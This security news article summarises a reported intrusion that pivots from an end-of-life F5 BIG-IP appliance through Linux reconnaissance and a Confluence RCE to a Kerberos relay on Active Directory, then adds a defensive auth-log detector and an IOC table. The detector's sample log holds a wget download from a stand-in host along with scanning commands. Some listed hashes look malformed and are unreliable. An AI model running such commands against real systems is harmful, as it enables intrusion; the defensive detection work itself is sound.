Hackers Exploit End-of-Life F5 BIG-IP Appliance to Gain SSH Access and Pivot Into Enterprise Linux Networks
Microsoft’s Defender Security Research Team has documented a sophisticated multi-stage intrusion in which threat actors exploited an internet-facing F5 BIG-IP edge appliance as the entry point for a widespread, identity-focused attack that ultimately reached Active Directory.
The attack reflects a growing and dangerous trend: firewalls, VPN gateways, and load balancers — devices traditionally deployed as security perimeters — are increasingly being repurposed as initial access vectors. Because these edge appliances are externally exposed, lightly monitored, and deeply trusted inside enterprise environments, a single breach can give attackers a durable, low-visibility foothold along with access to stored credentials, certificates, and identity integrations.
Initial Access: Exploiting an End-of-Life F5 BIG-IP Appliance
The threat actor established SSH access to the first internal Linux host originating from a network device identified as an F5 BIG-IP load balancer. Device inventory confirmed the source as an Azure-hosted BIG-IP Virtual Edition running version 15.1.201000 — a build commonly deployed via Azure ARM templates and Terraform modules — that reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of exploitation.
Key risk factor: the attacker authenticated with a privileged account that held sudo rights and kept hands-on-keyboard access through it. No separate persistence mechanism was needed, because the account itself was the foothold.
Discovery and Reconnaissance
Once inside the Linux environment, the attacker conducted aggressive internal reconnaissance. Shell scripts were used to perform lateral Nmap scans of the internal subnet to enumerate active hosts, followed by deeper vertical scans to identify open services. The tool GoWitness was then used via a SOCKS5 proxy to capture screenshots and fingerprint exposed HTTP/HTTPS services.
Upon discovering a Windows server, the attacker attempted NTLM-based lateral movement using a suite of open-source tools including enum4linux, netexec, smbclient, rpcclient, timeroast, ldapsearch, kerbrute, and responder. These initial attempts failed. The attacker then pulled a custom scanning tool — labeled HackTool:Linux/MalPack.B by Microsoft — from a command-and-control (C2) server using wget, which was used to probe the organization’s web applications and mobile services including Firebase and GCM to enumerate access controls.
Pivoting to Internal Confluence Server
Reconnaissance revealed an internal Atlassian Confluence server with unpatched vulnerabilities susceptible to remote code execution. While Confluence was not internet-facing, it was reachable from the attacker’s internal foothold. Since real-time protection on most hosts blocked payload drops, the attacker pivoted tactics, standing up an anonymous FTP server with Python on an ephemeral Linux host to facilitate data transfers.
After compromising Confluence, the attackers exfiltrated credentials from configuration files and used them against the Windows infrastructure.
Attack Chain at a Glance
Initial Access: SSH into Linux host via compromised Azure-hosted F5 BIG-IP (EOL v15.1.201000)
Reconnaissance: Internal Nmap scans, GoWitness fingerprinting via SOCKS5 proxy
Failed Lateral Movement: NTLM attempts against Windows servers using enum4linux, kerbrute, responder, netexec
Custom Tool Deployment: HackTool:Linux/MalPack.B fetched from C2 to probe web/mobile services
Confluence Exploit: Unpatched RCE vulnerability exploited; credentials harvested from config files
Identity Compromise: Kerberos relay attack using CVE-2025-33073, netexec + PetitPotam coercion + DNS manipulation targeting the domain controller
Kerberos Relay and Domain Compromise
With credentials obtained from Confluence, the attack escalated into a Kerberos relay attack exploiting CVE-2025-33073 — which removes the prerequisite of admin access to achieve authenticated remote code execution as SYSTEM on any domain-joined machine without SMB signing enforced, requiring only network access and any valid domain credential. The attacker used netexec in conjunction with PetitPotam coercion and DNS manipulation tools to target the domain controller.
Microsoft’s assessment: This intrusion demonstrates how a single RCE in a perimeter-adjacent web component can cascade into identity compromise across entirely separate applications, crossing platform and trust boundaries — and that attackers need not be sophisticated, only persistent, where patching and monitoring gaps exist across a hybrid estate.
Detection and Defender Response
Microsoft Defender for Endpoint detected the malicious activity and blocked the ELF payload on the one Confluence host where real-time protection was enabled. The incident underscores the critical importance of deploying endpoint protection consistently across all Linux hosts, not just Windows systems.
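The entry stage of this chain (an interactive SSH session originating from an edge appliance, followed by sudo-driven reconnaissance and staging) leaves a clear trail in Linux auth logs even on hosts without an EDR agent. The following detection logic is an added example, not code from the report or from Microsoft: it correlates sshd "Accepted" lines with subsequent sudo commands and alerts when a session sourced from an appliance address runs scanning or download tools. The log lines, the appliance address 10.0.0.5 and the download host 203.0.113.9 are constructed for the example.

```python
import re

# Constructed /var/log/auth.log sample (not taken from the incident report).
SAMPLE_LOG = """\
Apr 02 09:14:01 web01 sshd[2110]: Accepted publickey for ops from 10.0.0.5 port 51122 ssh2
Apr 02 09:14:01 web01 sshd[2110]: pam_unix(sshd:session): session opened for user ops by (uid=0)
Apr 02 09:15:40 web01 sudo:      ops : TTY=pts/1 ; PWD=/home/ops ; USER=root ; COMMAND=/usr/bin/nmap -sn 10.0.1.0/24
Apr 02 09:21:03 web01 sudo:      ops : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.9/scan
Apr 02 09:25:12 web01 sudo:      ops : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/python3 -m pyftpdlib -p 2121
Apr 02 11:02:10 web01 sshd[3311]: Accepted password for dev from 10.0.2.40 port 40210 ssh2
Apr 02 11:03:00 web01 sudo:      dev : TTY=pts/2 ; PWD=/home/dev ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Assumed addresses of edge appliances (load balancers, VPN gateways) that
# should never originate interactive SSH sessions to internal hosts.
EDGE_APPLIANCE_IPS = {"10.0.0.5"}

# Binaries whose use under sudo from such a session matches the recon and
# staging behaviour in the report (Nmap scans, wget from C2, Python FTP server).
RECON_BINARIES = {"nmap", "wget", "curl", "python3", "python"}

SSH_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<cmd>.+)$")


def find_edge_pivots(log_text):
    """Return (user, source_ip, command) for every sudo command run by a user
    whose most recent SSH login came from an edge appliance address."""
    session_src = {}  # user -> source IP of the most recent SSH login
    alerts = []
    for line in log_text.splitlines():
        m = SSH_RE.search(line)
        if m:
            session_src[m["user"]] = m["ip"]
            continue
        m = SUDO_RE.search(line)
        if not m:
            continue
        src = session_src.get(m["user"])
        if src not in EDGE_APPLIANCE_IPS:
            continue
        binary = m["cmd"].split()[0].rsplit("/", 1)[-1]  # strip path
        if binary in RECON_BINARIES:
            alerts.append((m["user"], src, m["cmd"]))
    return alerts


if __name__ == "__main__":
    for user, src, cmd in find_edge_pivots(SAMPLE_LOG):
        print(f"ALERT: {user} via edge appliance {src} ran: {cmd}")
```

Against the sample it flags the three ops commands and ignores the dev session from a workstation address; in production the appliance set would be fed from device inventory and the same join can be expressed as a SIEM query.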
Microsoft’s Mitigation Recommendations
Indicators of Compromise (IOC)
| Indicator | Type | Description |
|---|---|---|
| 4a927d0319fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda74655 | File Hash | Custom scanning tool (HackTool:Linux/MalPack.B) |
| B4592CEA69699B2C0737D4E19CFF7DCA17B5BAF5A238CD6DA950A37E9986F216 | File Hash | Shell script for automated network scanning using Nmap |
| 710a9d2653c8bd3689e451778dab9daec0de4C4C75F900788ccf23ef254B122a | File Hash | Kerbrute tool |
| 57B3188e24782C27FDF72493ce599537EFD3187D03B80F8AFE733C72D68C5517 | File Hash | GoWitness scanner |
| BDD5DA81ac34D9FAA2A5118D4ed8F492239734be02146cd24a0e34270a48A455 | File Hash | NTLM relay Python script |
| 206.189.27[.]39 | IPv4 / C2 | Command-and-control server (defanged — activate only within a controlled TIP such as MISP, VirusTotal, or your SIEM) |
